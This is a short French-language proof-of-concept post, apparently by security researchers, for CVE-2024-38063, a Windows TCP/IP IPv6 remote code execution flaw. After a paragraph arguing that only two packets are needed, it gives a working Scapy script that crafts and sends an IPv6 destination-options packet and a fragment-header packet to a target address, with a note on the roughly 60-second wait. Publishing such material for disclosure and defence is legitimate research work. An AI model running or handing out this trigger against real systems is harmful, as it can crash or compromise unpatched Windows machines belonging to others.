
Preuve de concept d'exploitation pour CVE-2024-38063, une vulnérabilité d'exécution de code à distance dans Windows TCP/IP déclenchée par l'envoi de deux paquets IPv6 contrefaits avec des options de destination et des en-têtes de fragment.
En août 2024, Microsoft a publié un correctif pour une vulnérabilité d'exécution de code à distance (RCE) dans TCP/IP de Windows. Certains chercheurs ont déjà publié des preuves de concept (PoC) pour cette vulnérabilité, et à peu près au même moment, les chercheurs de PatchPoint ont également terminé leur analyse et la reproduction de ce problème. En raison de la désinformation sur diverses plateformes, y compris Twitter, il semble que les points critiques nécessaires pour déclencher cette vulnérabilité aient été mal compris. Contrairement à ces inexactitudes, nous avons décidé de publier un PoC qui démontre comment cette vulnérabilité peut être déclenchée avec la transmission de seulement deux paquets. En réalité, un grand nombre de paquets n'est pas nécessaire pour déclencher cette vulnérabilité.
from scapy.all import *
IPAddr = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

※ Pour déclencher la vulnérabilité, un temps d'attente d'environ 60 secondes est requis